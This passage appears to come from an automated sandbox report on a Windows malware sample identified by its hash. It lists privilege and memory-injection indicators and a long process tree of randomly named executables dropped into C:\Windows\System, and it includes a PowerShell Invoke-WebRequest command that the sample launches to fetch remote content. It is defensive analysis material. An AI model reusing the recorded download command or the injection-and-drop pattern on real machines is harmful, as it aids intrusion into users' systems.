Token: SeDebugPrivilege	1076	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2360 wrote to memory of 1076	2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe	29
PID 2360 wrote to memory of 1076	2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe	29
PID 2360 wrote to memory of 1076	2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe	29
PID 2360 wrote to memory of 2948	2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe	30
PID 2360 wrote to memory of 2948	2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe	30
PID 2360 wrote to memory of 2948	2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe	30
PID 2360 wrote to memory of 2852	2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe	31
PID 2360 wrote to memory of 2852	2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe	31
PID 2360 wrote to memory of 2852	2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe	31
PID 2360 wrote to memory of 2704	2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe	32
PID 2360 wrote to memory of 2704	2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe	32
PID 2360 wrote to memory of 2704	2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe	32
PID 2360 wrote to memory of 2732	2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe	33
PID 2360 wrote to memory of 2732	2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe	33
PID 2360 wrote to memory of 2732	2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe	33
PID 2360 wrote to memory of 2596	2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe	34
PID 2360 wrote to memory of 2596	2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe	34
PID 2360 wrote to memory of 2596	2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe	34
PID 2360 wrote to memory of 2284	2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe	35
PID 2360 wrote to memory of 2284	2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe	35
PID 2360 wrote to memory of 2284	2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe	35
PID 2360 wrote to memory of 2612	2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe	36
PID 2360 wrote to memory of 2612	2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe	36
PID 2360 wrote to memory of 2612	2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe	36
PID 2360 wrote to memory of 492	2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe	37
PID 2360 wrote to memory of 492	2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe	37
PID 2360 wrote to memory of 492	2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe	37
PID 2360 wrote to memory of 2276	2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe	38
PID 2360 wrote to memory of 2276	2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe	38
PID 2360 wrote to memory of 2276	2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe	38
PID 2360 wrote to memory of 1912	2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe	39
PID 2360 wrote to memory of 1912	2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe	39
PID 2360 wrote to memory of 1912	2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe	39
PID 2360 wrote to memory of 2640	2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe	40
PID 2360 wrote to memory of 2640	2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe	40
PID 2360 wrote to memory of 2640	2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe	40
PID 2360 wrote to memory of 2036	2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe	41
PID 2360 wrote to memory of 2036	2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe	41
PID 2360 wrote to memory of 2036	2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe	41
PID 2360 wrote to memory of 2668	2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe	42
PID 2360 wrote to memory of 2668	2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe	42
PID 2360 wrote to memory of 2668	2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe	42
PID 2360 wrote to memory of 2108	2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe	43
PID 2360 wrote to memory of 2108	2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe	43
PID 2360 wrote to memory of 2108	2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe	43
PID 2360 wrote to memory of 864	2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe	44
PID 2360 wrote to memory of 864	2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe	44
PID 2360 wrote to memory of 864	2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe	44
PID 2360 wrote to memory of 2632	2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe	45
PID 2360 wrote to memory of 2632	2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe	45
PID 2360 wrote to memory of 2632	2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe	45
PID 2360 wrote to memory of 2148	2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe	46
PID 2360 wrote to memory of 2148	2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe	46
PID 2360 wrote to memory of 2148	2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe	46
PID 2360 wrote to memory of 2556	2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe	47
PID 2360 wrote to memory of 2556	2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe	47
PID 2360 wrote to memory of 2556	2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe	47
PID 2360 wrote to memory of 2752	2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe	48
PID 2360 wrote to memory of 2752	2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe	48
PID 2360 wrote to memory of 2752	2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe	48
PID 2360 wrote to memory of 2912	2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe	49
PID 2360 wrote to memory of 2912	2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe	49
PID 2360 wrote to memory of 2912	2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe	49
PID 2360 wrote to memory of 2016	2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe	50

C:\Users\Admin\AppData\Local\Temp\b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
"C:\Users\Admin\AppData\Local\Temp\b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe"
1⤵
- Loads dropped DLL
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2360
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1076
- C:\Windows\System\hxtxzmc.exe
  C:\Windows\System\hxtxzmc.exe
  2⤵
  - Executes dropped EXE
  PID:2948
- C:\Windows\System\HumSEMF.exe
  C:\Windows\System\HumSEMF.exe
  2⤵
  - Executes dropped EXE
  PID:2852
- C:\Windows\System\OQIrCmP.exe
  C:\Windows\System\OQIrCmP.exe
  2⤵
  - Executes dropped EXE
  PID:2704
- C:\Windows\System\gsCfhCG.exe
  C:\Windows\System\gsCfhCG.exe
  2⤵
  - Executes dropped EXE
  PID:2732
- C:\Windows\System\xniPPvw.exe
  C:\Windows\System\xniPPvw.exe
  2⤵
  - Executes dropped EXE
  PID:2596
- C:\Windows\System\iwzCkyX.exe
  C:\Windows\System\iwzCkyX.exe
  2⤵
  - Executes dropped EXE
  PID:2284
- C:\Windows\System\aYAGcaG.exe
  C:\Windows\System\aYAGcaG.exe
  2⤵
  - Executes dropped EXE
  PID:2612
- C:\Windows\System\sTsnISy.exe
  C:\Windows\System\sTsnISy.exe
  2⤵
  - Executes dropped EXE
  PID:492
- C:\Windows\System\rdsqhhG.exe
  C:\Windows\System\rdsqhhG.exe
  2⤵
  - Executes dropped EXE
  PID:2276
- C:\Windows\System\JpThPFP.exe
  C:\Windows\System\JpThPFP.exe
  2⤵
  - Executes dropped EXE
  PID:1912
- C:\Windows\System\ggHFwGO.exe
  C:\Windows\System\ggHFwGO.exe
  2⤵
  - Executes dropped EXE
  PID:2640
- C:\Windows\System\ubSwrLT.exe
  C:\Windows\System\ubSwrLT.exe
  2⤵
  - Executes dropped EXE
  PID:2036
- C:\Windows\System\omkMHQY.exe
  C:\Windows\System\omkMHQY.exe
  2⤵
  - Executes dropped EXE
  PID:2668
- C:\Windows\System\kOOfVDY.exe
  C:\Windows\System\kOOfVDY.exe
  2⤵
  - Executes dropped EXE
  PID:2108
- C:\Windows\System\ZyfYpmV.exe
  C:\Windows\System\ZyfYpmV.exe
  2⤵
  - Executes dropped EXE
  PID:864
- C:\Windows\System\mRIpWWr.exe
  C:\Windows\System\mRIpWWr.exe
  2⤵
  - Executes dropped EXE
  PID:2632
- C:\Windows\System\EZXWtGH.exe
  C:\Windows\System\EZXWtGH.exe
  2⤵
  - Executes dropped EXE
  PID:2148
- C:\Windows\System\FXXzEPf.exe
  C:\Windows\System\FXXzEPf.exe
  2⤵
  - Executes dropped EXE
  PID:2556
- C:\Windows\System\mhRIJyB.exe
  C:\Windows\System\mhRIJyB.exe
  2⤵
  - Executes dropped EXE
  PID:2752
- C:\Windows\System\BiyzdgQ.exe
  C:\Windows\System\BiyzdgQ.exe
  2⤵
  - Executes dropped EXE
  PID:2912
- C:\Windows\System\FhUBtcA.exe
  C:\Windows\System\FhUBtcA.exe
  2⤵
  - Executes dropped EXE
  PID:2016
- C:\Windows\System\UVMweoY.exe
  C:\Windows\System\UVMweoY.exe
  2⤵
  - Executes dropped EXE
  PID:1512
- C:\Windows\System\ghFxwJi.exe
  C:\Windows\System\ghFxwJi.exe
  2⤵
  - Executes dropped EXE
  PID:1584
- C:\Windows\System\bEJhFcU.exe
  C:\Windows\System\bEJhFcU.exe
  2⤵
  - Executes dropped EXE
  PID:1508
- C:\Windows\System\PLAcKpc.exe
  C:\Windows\System\PLAcKpc.exe
  2⤵
  - Executes dropped EXE
  PID:1664
- C:\Windows\System\YtDAtDn.exe
  C:\Windows\System\YtDAtDn.exe
  2⤵
  - Executes dropped EXE
  PID:1864
- C:\Windows\System\NoyIWJq.exe
  C:\Windows\System\NoyIWJq.exe
  2⤵
  - Executes dropped EXE
  PID:1948
- C:\Windows\System\cZVGRMw.exe
  C:\Windows\System\cZVGRMw.exe
  2⤵
  - Executes dropped EXE
  PID:3008
- C:\Windows\System\eZQCMzD.exe
  C:\Windows\System\eZQCMzD.exe
  2⤵
  - Executes dropped EXE
  PID:2404
- C:\Windows\System\qlDFaER.exe
  C:\Windows\System\qlDFaER.exe
  2⤵
  - Executes dropped EXE
  PID:3016
- C:\Windows\System\fGwMwlS.exe
  C:\Windows\System\fGwMwlS.exe
  2⤵
  - Executes dropped EXE
  PID:532
- C:\Windows\System\vWTFKXu.exe
  C:\Windows\System\vWTFKXu.exe
  2⤵
  - Executes dropped EXE
  PID:568
- C:\Windows\System\XcGOjKS.exe
  C:\Windows\System\XcGOjKS.exe
  2⤵
  - Executes dropped EXE
  PID:1000
- C:\Windows\System\czEbwlC.exe
  C:\Windows\System\czEbwlC.exe
  2⤵
  - Executes dropped EXE
  PID:1624
- C:\Windows\System\cWSvIYw.exe
  C:\Windows\System\cWSvIYw.exe
  2⤵
  - Executes dropped EXE
  PID:1728
- C:\Windows\System\DceoQqC.exe
  C:\Windows\System\DceoQqC.exe
  2⤵
  - Executes dropped EXE
  PID:1732
- C:\Windows\System\wGiMiLP.exe
  C:\Windows\System\wGiMiLP.exe
  2⤵
  - Executes dropped EXE
  PID:828
- C:\Windows\System\ypRLXVA.exe
  C:\Windows\System\ypRLXVA.exe
  2⤵
  - Executes dropped EXE
  PID:324
- C:\Windows\System\RUiHKqC.exe
  C:\Windows\System\RUiHKqC.exe
  2⤵
  - Executes dropped EXE
  PID:2004
- C:\Windows\System\kloXcQQ.exe
  C:\Windows\System\kloXcQQ.exe
  2⤵
  - Executes dropped EXE
  PID:1416
- C:\Windows\System\mONydVn.exe
  C:\Windows\System\mONydVn.exe
  2⤵
  - Executes dropped EXE
  PID:684
- C:\Windows\System\zqHgusr.exe
  C:\Windows\System\zqHgusr.exe
  2⤵
  - Executes dropped EXE
  PID:1180
- C:\Windows\System\eRPNxMZ.exe
  C:\Windows\System\eRPNxMZ.exe
  2⤵
  - Executes dropped EXE
  PID:1760
- C:\Windows\System\zFrtavT.exe
  C:\Windows\System\zFrtavT.exe
  2⤵
  - Executes dropped EXE
  PID:2032
- C:\Windows\System\heJNbBZ.exe
  C:\Windows\System\heJNbBZ.exe
  2⤵
  - Executes dropped EXE
  PID:2408
- C:\Windows\System\zTkEFUu.exe
  C:\Windows\System\zTkEFUu.exe
  2⤵
  - Executes dropped EXE
  PID:2068
- C:\Windows\System\OLgNSNx.exe
  C:\Windows\System\OLgNSNx.exe
  2⤵
  - Executes dropped EXE
  PID:1516
- C:\Windows\System\vxUxmVN.exe
  C:\Windows\System\vxUxmVN.exe
  2⤵
  - Executes dropped EXE
  PID:1816
- C:\Windows\System\NlZPlYm.exe
  C:\Windows\System\NlZPlYm.exe
  2⤵
  - Executes dropped EXE
  PID:1820
- C:\Windows\System\TDdOpkc.exe
  C:\Windows\System\TDdOpkc.exe
  2⤵
  - Executes dropped EXE
  PID:1372
- C:\Windows\System\pmEzmEi.exe
  C:\Windows\System\pmEzmEi.exe
  2⤵
  - Executes dropped EXE
  PID:2324
- C:\Windows\System\IZIgGDb.exe
  C:\Windows\System\IZIgGDb.exe
  2⤵
  - Executes dropped EXE
  PID:1632
- C:\Windows\System\PMbVZpj.exe
  C:\Windows\System\PMbVZpj.exe
  2⤵
  - Executes dropped EXE
  PID:1628
- C:\Windows\System\jJDpqVq.exe
  C:\Windows\System\jJDpqVq.exe
  2⤵
  - Executes dropped EXE
  PID:1036
- C:\Windows\System\eJKknGT.exe
  C:\Windows\System\eJKknGT.exe
  2⤵
  - Executes dropped EXE
  PID:540
- C:\Windows\System\odmoPtS.exe
  C:\Windows\System\odmoPtS.exe
  2⤵
  - Executes dropped EXE
  PID:576
- C:\Windows\System\MnKzWAU.exe
  C:\Windows\System\MnKzWAU.exe
  2⤵
  - Executes dropped EXE
  PID:2296
- C:\Windows\System\tiqJBJI.exe
  C:\Windows\System\tiqJBJI.exe
  2⤵
  - Executes dropped EXE
  PID:2500
- C:\Windows\System\qZOHPLX.exe
  C:\Windows\System\qZOHPLX.exe
  2⤵
  - Executes dropped EXE
  PID:760
- C:\Windows\System\vevLfrj.exe
  C:\Windows\System\vevLfrj.exe
  2⤵
  - Executes dropped EXE
  PID:1256
- C:\Windows\System\DYhFCvw.exe
  C:\Windows\System\DYhFCvw.exe
  2⤵
  - Executes dropped EXE
  PID:820
- C:\Windows\System\OXjdfSN.exe
  C:\Windows\System\OXjdfSN.exe
  2⤵
  - Executes dropped EXE
  PID:2292
- C:\Windows\System\PkmFmyW.exe
  C:\Windows\System\PkmFmyW.exe
  2⤵
  - Executes dropped EXE
  PID:2980
- C:\Windows\System\sZQNTPL.exe
  C:\Windows\System\sZQNTPL.exe
  2⤵
  - Executes dropped EXE
  PID:880
- C:\Windows\System\FMugwTP.exe
  C:\Windows\System\FMugwTP.exe
  2⤵
  PID:1124
- C:\Windows\System\vvsGQVN.exe
  C:\Windows\System\vvsGQVN.exe
  2⤵
  PID:1768
- C:\Windows\System\ctFxigF.exe
  C:\Windows\System\ctFxigF.exe
  2⤵
  PID:2436
- C:\Windows\System\ENShiDJ.exe
  C:\Windows\System\ENShiDJ.exe
  2⤵
  PID:2432
- C:\Windows\System\LODtEZD.exe
  C:\Windows\System\LODtEZD.exe
  2⤵
  PID:840
- C:\Windows\System\RIKZgGD.exe
  C:\Windows\System\RIKZgGD.exe
  2⤵
  PID:2440
- C:\Windows\System\KAsvZMH.exe
  C:\Windows\System\KAsvZMH.exe
  2⤵
  PID:2676
- C:\Windows\System\IUEbTWR.exe
  C:\Windows\System\IUEbTWR.exe
  2⤵
  PID:2772
- C:\Windows\System\VZrjlcX.exe
  C:\Windows\System\VZrjlcX.exe
  2⤵
  PID:2680
- C:\Windows\System\lHKZfpM.exe
  C:\Windows\System\lHKZfpM.exe
  2⤵
  PID:2780
- C:\Windows\System\koxlQsc.exe
  C:\Windows\System\koxlQsc.exe
  2⤵
  PID:2880
- C:\Windows\System\QPHdjUv.exe
  C:\Windows\System\QPHdjUv.exe
  2⤵
  PID:2864
- C:\Windows\System\fEgvrda.exe
  C:\Windows\System\fEgvrda.exe
  2⤵
  PID:2616
- C:\Windows\System\Efzrkgk.exe
  C:\Windows\System\Efzrkgk.exe
  2⤵
  PID:1092
- C:\Windows\System\UaEZcQa.exe
  C:\Windows\System\UaEZcQa.exe
  2⤵
  PID:1968
- C:\Windows\System\znfYfwg.exe
  C:\Windows\System\znfYfwg.exe
  2⤵
  PID:2288
- C:\Windows\System\sdxiBJK.exe
  C:\Windows\System\sdxiBJK.exe
  2⤵
  PID:2140
- C:\Windows\System\lycRmMo.exe
  C:\Windows\System\lycRmMo.exe
  2⤵
  PID:2800
- C:\Windows\System\gjsXBGW.exe
  C:\Windows\System\gjsXBGW.exe
  2⤵
  PID:1652
- C:\Windows\System\sQtcoeZ.exe
  C:\Windows\System\sQtcoeZ.exe
  2⤵
  PID:2828
- C:\Windows\System\oqSYbcg.exe
  C:\Windows\System\oqSYbcg.exe
  2⤵
  PID:2064
- C:\Windows\System\cUIxVHf.exe
  C:\Windows\System\cUIxVHf.exe
  2⤵
  PID:1612
- C:\Windows\System\hMzwank.exe
  C:\Windows\System\hMzwank.exe
  2⤵
  PID:2216
- C:\Windows\System\eItPhwU.exe
  C:\Windows\System\eItPhwU.exe
  2⤵
  PID:1248
- C:\Windows\System\nfKiCDO.exe
  C:\Windows\System\nfKiCDO.exe
  2⤵
  PID:2084
- C:\Windows\System\LsDGsAS.exe
  C:\Windows\System\LsDGsAS.exe
  2⤵
  PID:776
- C:\Windows\System\hBtjFoa.exe
  C:\Windows\System\hBtjFoa.exe
  2⤵
  PID:768
- C:\Windows\System\nKFxpNV.exe
  C:\Windows\System\nKFxpNV.exe
  2⤵
  PID:1744
- C:\Windows\System\EyTbCXf.exe
  C:\Windows\System\EyTbCXf.exe
  2⤵
  PID:1460
- C:\Windows\System\UxmUxNm.exe
  C:\Windows\System\UxmUxNm.exe
  2⤵
  PID:1152
- C:\Windows\System\fwJDGKO.exe
  C:\Windows\System\fwJDGKO.exe
  2⤵
  PID:3028
- C:\Windows\System\eOpGssY.exe
  C:\Windows\System\eOpGssY.exe
  2⤵
  PID:2540
- C:\Windows\System\ipDGXOa.exe
  C:\Windows\System\ipDGXOa.exe
  2⤵
  PID:2056
- C:\Windows\System\QcyBJDQ.exe
  C:\Windows\System\QcyBJDQ.exe
  2⤵
  PID:1896
- C:\Windows\System\qKLtxzz.exe
  C:\Windows\System\qKLtxzz.exe
  2⤵
  PID:976
- C:\Windows\System\WAlfGnG.exe
  C:\Windows\System\WAlfGnG.exe
  2⤵
  PID:780
- C:\Windows\System\XvUHekq.exe
  C:\Windows\System\XvUHekq.exe
  2⤵
  PID:1680
- C:\Windows\System\YwfkbdQ.exe
  C:\Windows\System\YwfkbdQ.exe
  2⤵
  PID:1636
- C:\Windows\System\xpUjKeK.exe
  C:\Windows\System\xpUjKeK.exe
  2⤵
  PID:564
- C:\Windows\System\cKthsBJ.exe
  C:\Windows\System\cKthsBJ.exe
  2⤵
  PID:2492
- C:\Windows\System\RPiZjpu.exe
  C:\Windows\System\RPiZjpu.exe
  2⤵
  PID:1996
- C:\Windows\System\BfJQmym.exe
  C:\Windows\System\BfJQmym.exe
  2⤵
  PID:2392
- C:\Windows\System\IcsKYte.exe
  C:\Windows\System\IcsKYte.exe
  2⤵
  PID:1552
- C:\Windows\System\eGulUai.exe
  C:\Windows\System\eGulUai.exe
  2⤵
  PID:940
- C:\Windows\System\gHBCQDJ.exe
  C:\Windows\System\gHBCQDJ.exe
  2⤵
  PID:3044
- C:\Windows\System\VFeUyjF.exe
  C:\Windows\System\VFeUyjF.exe
  2⤵
  PID:1572
- C:\Windows\System\wZtLxzD.exe
  C:\Windows\System\wZtLxzD.exe
  2⤵
  PID:2776
- C:\Windows\System\GhixiqR.exe
  C:\Windows\System\GhixiqR.exe
  2⤵
  PID:2412
- C:\Windows\System\NZPpdDW.exe
  C:\Windows\System\NZPpdDW.exe
  2⤵
  PID:2604
- C:\Windows\System\qaraUZf.exe
  C:\Windows\System\qaraUZf.exe
  2⤵
  PID:2736
- C:\Windows\System\oAIhPod.exe
  C:\Windows\System\oAIhPod.exe
  2⤵
  PID:1260
- C:\Windows\System\CGXDtds.exe
  C:\Windows\System\CGXDtds.exe
  2⤵
  PID:2136
- C:\Windows\System\xGoNakf.exe
  C:\Windows\System\xGoNakf.exe
  2⤵
  PID:1656
- C:\Windows\System\SWbgFMR.exe
  C:\Windows\System\SWbgFMR.exe
  2⤵
  PID:1200
- C:\Windows\System\QZhvvCr.exe
  C:\Windows\System\QZhvvCr.exe
  2⤵
  PID:1772
- C:\Windows\System\LdGwBJs.exe
  C:\Windows\System\LdGwBJs.exe
  2⤵
  PID:2552
- C:\Windows\System\hEEpkco.exe
  C:\Windows\System\hEEpkco.exe
  2⤵
  PID:632
- C:\Windows\System\CXwQTQP.exe
  C:\Windows\System\CXwQTQP.exe
  2⤵
  PID:3080
- C:\Windows\System\sMHqJZH.exe
  C:\Windows\System\sMHqJZH.exe
  2⤵
  PID:3096
- C:\Windows\System\szjalim.exe
  C:\Windows\System\szjalim.exe
  2⤵
  PID:3112
- C:\Windows\System\pslcRcV.exe
  C:\Windows\System\pslcRcV.exe
  2⤵
  PID:3128
- C:\Windows\System\VcDXUhE.exe
  C:\Windows\System\VcDXUhE.exe
  2⤵
  PID:3144
- C:\Windows\System\aWThrcz.exe
  C:\Windows\System\aWThrcz.exe
  2⤵
  PID:3160
- C:\Windows\System\hgQmguV.exe
  C:\Windows\System\hgQmguV.exe
  2⤵
  PID:3176
- C:\Windows\System\TMXVBvI.exe
  C:\Windows\System\TMXVBvI.exe
  2⤵
  PID:3192
- C:\Windows\System\QrDGbkr.exe
  C:\Windows\System\QrDGbkr.exe
  2⤵
  PID:3208
- C:\Windows\System\GmkJdwN.exe
  C:\Windows\System\GmkJdwN.exe
  2⤵
  PID:3224
- C:\Windows\System\zUUGgMK.exe
  C:\Windows\System\zUUGgMK.exe
  2⤵
  PID:3240
- C:\Windows\System\UNYcUcN.exe
  C:\Windows\System\UNYcUcN.exe
  2⤵
  PID:3256
- C:\Windows\System\PSgQpto.exe
  C:\Windows\System\PSgQpto.exe
  2⤵
  PID:3272
- C:\Windows\System\PeIzTqG.exe
  C:\Windows\System\PeIzTqG.exe
  2⤵
  PID:3288
- C:\Windows\System\cIivMMH.exe
  C:\Windows\System\cIivMMH.exe
  2⤵
  PID:3304
- C:\Windows\System\GnWFtqN.exe
  C:\Windows\System\GnWFtqN.exe
  2⤵
  PID:3320
- C:\Windows\System\AGTVqbf.exe
  C:\Windows\System\AGTVqbf.exe
  2⤵
  PID:3336
- C:\Windows\System\VRoqnkJ.exe
  C:\Windows\System\VRoqnkJ.exe
  2⤵
  PID:3352
- C:\Windows\System\vaclfUd.exe
  C:\Windows\System\vaclfUd.exe
  2⤵
  PID:3368
- C:\Windows\System\yNhKqvg.exe
  C:\Windows\System\yNhKqvg.exe
  2⤵
  PID:3384
- C:\Windows\System\SWqebtl.exe
  C:\Windows\System\SWqebtl.exe
  2⤵
  PID:3400
- C:\Windows\System\ywnYqeY.exe
  C:\Windows\System\ywnYqeY.exe
  2⤵
  PID:3416
- C:\Windows\System\AGIIXok.exe
  C:\Windows\System\AGIIXok.exe
  2⤵
  PID:3432
- C:\Windows\System\jkDRxky.exe
  C:\Windows\System\jkDRxky.exe
  2⤵
  PID:3448
- C:\Windows\System\AdSPdbd.exe
  C:\Windows\System\AdSPdbd.exe
  2⤵
  PID:3464
- C:\Windows\System\HFUaTLL.exe
  C:\Windows\System\HFUaTLL.exe
  2⤵
  PID:3480
- C:\Windows\System\xfOlOUP.exe
  C:\Windows\System\xfOlOUP.exe
  2⤵
  PID:3496
- C:\Windows\System\YCWAver.exe
  C:\Windows\System\YCWAver.exe
  2⤵
  PID:3512
- C:\Windows\System\xgfNxZX.exe
  C:\Windows\System\xgfNxZX.exe
  2⤵
  PID:3528
- C:\Windows\System\YlcLjZj.exe
  C:\Windows\System\YlcLjZj.exe
  2⤵
  PID:3544
- C:\Windows\System\GwmywpQ.exe
  C:\Windows\System\GwmywpQ.exe
  2⤵
  PID:3560
- C:\Windows\System\tEaIvpg.exe
  C:\Windows\System\tEaIvpg.exe
  2⤵
  PID:3576
- C:\Windows\System\rGbOaVs.exe
  C:\Windows\System\rGbOaVs.exe
  2⤵
  PID:3592
- C:\Windows\System\mdErWYS.exe
  C:\Windows\System\mdErWYS.exe
  2⤵
  PID:3608
- C:\Windows\System\dDnAJSm.exe
  C:\Windows\System\dDnAJSm.exe
  2⤵
  PID:3624
- C:\Windows\System\aKkoKBO.exe
  C:\Windows\System\aKkoKBO.exe
  2⤵
  PID:3640
- C:\Windows\System\kDfistr.exe
  C:\Windows\System\kDfistr.exe
  2⤵
  PID:3656
- C:\Windows\System\pAyQLjL.exe
  C:\Windows\System\pAyQLjL.exe
  2⤵
  PID:3672
- C:\Windows\System\JKkvcKF.exe
  C:\Windows\System\JKkvcKF.exe
  2⤵
  PID:3688
- C:\Windows\System\cInAYaY.exe
  C:\Windows\System\cInAYaY.exe
  2⤵
  PID:3704
- C:\Windows\System\NoqYFvM.exe
  C:\Windows\System\NoqYFvM.exe
  2⤵
  PID:3720
- C:\Windows\System\wPiuxQR.exe
  C:\Windows\System\wPiuxQR.exe
  2⤵
  PID:3736
- C:\Windows\System\DtslbLQ.exe
  C:\Windows\System\DtslbLQ.exe
  2⤵
  PID:3752
- C:\Windows\System\ivIexqQ.exe
  C:\Windows\System\ivIexqQ.exe
  2⤵
  PID:3768
- C:\Windows\System\VdlEYUG.exe
  C:\Windows\System\VdlEYUG.exe
  2⤵
  PID:3784
- C:\Windows\System\cjGuNqL.exe
  C:\Windows\System\cjGuNqL.exe
  2⤵
  PID:3800
- C:\Windows\System\pPbBaTk.exe
  C:\Windows\System\pPbBaTk.exe
  2⤵
  PID:3820
- C:\Windows\System\TyOzpVv.exe
  C:\Windows\System\TyOzpVv.exe
  2⤵
  PID:3836
- C:\Windows\System\vDEAMud.exe
  C:\Windows\System\vDEAMud.exe
  2⤵
  PID:3852
- C:\Windows\System\nmyLVsn.exe
  C:\Windows\System\nmyLVsn.exe
  2⤵
  PID:3868
- C:\Windows\System\fpAIzsS.exe
  C:\Windows\System\fpAIzsS.exe
  2⤵
  PID:3884
- C:\Windows\System\DwnPEer.exe
  C:\Windows\System\DwnPEer.exe
  2⤵
  PID:3900
- C:\Windows\System\cxjazeA.exe
  C:\Windows\System\cxjazeA.exe
  2⤵
  PID:3916
- C:\Windows\System\NWwjkpZ.exe
  C:\Windows\System\NWwjkpZ.exe
  2⤵
  PID:3932
- C:\Windows\System\BJBKthN.exe
